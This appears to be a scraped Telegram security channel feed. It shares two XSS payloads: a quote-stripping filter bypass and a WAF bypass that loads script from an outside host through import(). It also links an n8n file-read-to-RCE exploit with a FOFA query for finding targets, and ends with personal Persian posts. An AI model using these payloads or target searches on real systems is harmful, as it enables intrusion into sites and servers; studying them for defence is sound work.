Found an XSS bypass during a bug bounty:
Backend was only stripping quotes ("), so payload like:
<s"vg o"nload=al"ert() />
turns into a valid:
<noscript onload=alert()>
🚨 Never rely on poor input filtering!
#BugBounty #CyberSecurity
⭐️ @RadvanSec
Backend was only stripping quotes ("), so payload like:
<s"vg o"nload=al"ert() />
turns into a valid:
<noscript onload=alert()>
🚨 Never rely on poor input filtering!
#BugBounty #CyberSecurity
⭐️ @RadvanSec
❤2👍2🔥1
https://portswigger.net/research/top-10-web-hacking-techniques-of-2025-nominations-open
⭐️ @RadvanSec
⭐️ @RadvanSec
PortSwigger Research
Top 10 web hacking techniques of 2025: call for nominations
Update: nominations are now closed, and voting is live! Cast your vote here Over the last year, security researchers have shared a huge amount of work with the community through blog posts, presentati
❤4🔥1
#Bypass Imperva, Akamai and CloudFlare WAF
=> Prepend with 50 chars then use
1"><A HRef=%26quot AutoFocus OnFocus%0C={import(/https:X55.is/.source)}>
PoC: x55.is/brutelogic/xss…
⭐️ @RadvanSec
=> Prepend with 50 chars then use
1"><A HRef=%26quot AutoFocus OnFocus%0C={import(/https:X55.is/.source)}>
PoC: x55.is/brutelogic/xss…
⭐️ @RadvanSec
❤4
CVE-2026-21858.yaml
1.8 KB
n8n Ni8mare - Unauthenticated Arbitrary File Read to RCE Chain
https://github.com/Chocapikk/CVE-2026-21858
⭐️ @RadvanSec
https://github.com/Chocapikk/CVE-2026-21858
fofa:icon_hash="-831756631"
⭐️ @RadvanSec
👍5❤3🔥1
PentesterLand Academy - Public
حرف برا گفتن زیاده ولی قبل از همه حرفا یه چیز قطعیه برا من، پلن مهاجرت تا ماه پیش یه تصمیم بود الان برام یه اجباره
متاسفانه اولویت همگانی شده کسی بخواد کار کنه تو این وضعیت واقعا کار سخت و دشواری شده
👍7
بچه ها کانال اینترنت ازاد پروکسی ای چیزی داشتید بفرستید لینک کانالارو و یا کانفیگ رو داخل کانال قرار بدم
❤3
من واقعا از ناراحتی خواب به چشمم نمیاد چه کسایی از دوستانمون بودن که دیگه قرار نیست آنلاین بشن💔
❤4